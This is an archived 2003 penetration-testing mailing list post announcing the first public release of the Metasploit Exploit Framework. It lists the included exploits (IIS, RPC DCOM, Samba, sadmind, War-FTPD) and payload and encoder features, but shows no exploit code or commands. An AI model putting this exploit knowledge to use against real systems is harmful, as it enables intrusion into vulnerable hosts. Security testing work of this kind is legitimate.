Penetration Testing mailing list archives

Previous By Date Next
Previous By Thread Next

MetaSploit Exploit Framework v1.0

From: H D Moore <sflist () digitaloffense net>
Date: Mon, 6 Oct 2003 15:47:43 -0500
I finally released the first public version of the Exploit Framework code, 
you can grab a copy at:

http://metasploit.com/tools/framework-1.0.tar.gz
http://metasploit.com/tools/framework-1.0.zip

The GUI is still linux-only and buggy, however the CLI now runs on every 
common Unix-like platform as well as Windows under ActiveState Perl. The 
Pex library has been overhauled, it now includes the fnstenv xor encoder 
and the updated/optimized versions of the metasploit win32 payloads. 

The Pex code and documentation can be found at:

http://metasploit.com/tools/Pex.pm
http://metasploit.com/projects/Pex/Pex.pod.html

This first release includes exploits for:

- IIS 5.0 nsiislog.dll POST Overflow
- IIS 5.0 NTDLL via WebDAV (working almost 100%, all SP's)
- IIS 5.0 Printer Overflow (one return address for SP0 and SP1)
- MS03-026 RPC DCOM (arbitrary payloads are useful)
- Apache Win32 Chunked Encoding (NT 4.0 and Win2K)
- Samba trans2open Overflow (Linux and FreeBSD)
- Solaris sadmind Command Execution
- War-FTPD 1.65 PASS Overflow (Win2k)

A ton of new ones are on the way, this set was just released to demo/test 
the framework and exploit API. Some highlights of this release:

- Encoded payloads are cached; even though it takes a couple minutes to 
generate a win32bind or win32reverse payload for the WebDAV exploit, you 
will only need to do it once.

- The exploit command shell sessions are logged by default to 
$HOME/.Pex/Session-X.log. This is especially useful for people who need 
to track what they did on each host they compromised.

A completely new shellcode encoding engine is in the works, as well as a 
multi-stage loader for exploiting bugs with extremely limited shellspace. 
I would also like to add the feature to hardcode addresses for one or 
more common OS/SP combinations. The whole thing is 
released under GPL, have fun :)

-HD

---------------------------------------------------------------------------
Tired of constantly searching the web for the latest exploits?
Tired of using 300 different tools to do one job?
Get CORE IMPACT and get some rest.
www.coresecurity.com/promos/sf_ept2
----------------------------------------------------------------------------
Previous By Date Next
Previous By Thread Next

Current thread: